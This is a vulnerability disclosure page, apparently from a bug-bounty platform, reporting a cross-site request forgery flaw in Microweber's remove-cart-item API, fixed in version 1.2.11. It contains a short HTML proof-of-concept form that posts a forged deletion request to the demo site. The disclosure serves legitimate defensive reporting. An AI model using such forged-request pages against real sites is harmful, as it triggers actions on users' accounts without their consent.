/

Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Oct 26th 2021

Description

There is a CSRF on Delete Cart Item in users side.

I get this error "Item not removed from cart" message but the item already will be deleted.(message isn't correct and the delete action will be done)

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/remove_cart_item" method="POST">
      <input type="hidden" name="id" value="125" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

after that you click on submit button the item with 125 id will be deleted from the cart.

Occurrences

api_callbacks.php L126

ShopManager.php L101-L105

shop.js L115-L133

shop.php L104-L115

We have contacted a member of the microweber team and are waiting to hear back a year ago

Peter Ivanov validated this vulnerability a year ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Peter Ivanov marked this as fixed in 1.2.11 with commit 2fa9a6 a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

api_callbacks.php#L126 has been validated

shop.js#L115-L133 has been validated

ShopManager.php#L101-L105 has been validated

shop.php#L104-L115 has been validated

to join this conversation

We have contacted a member of the microweber team and are waiting to hear back a year ago

Peter Ivanov validated this vulnerability a year ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Peter Ivanov marked this as fixed in 1.2.11 with commit 2fa9a6 a year ago

Peter Ivanov has been awarded the fix bounty

This vulnerability will not receive a CVE

api_callbacks.php#L126 has been validated

shop.js#L115-L133 has been validated

ShopManager.php#L101-L105 has been validated

shop.php#L104-L115 has been validated

to join this conversation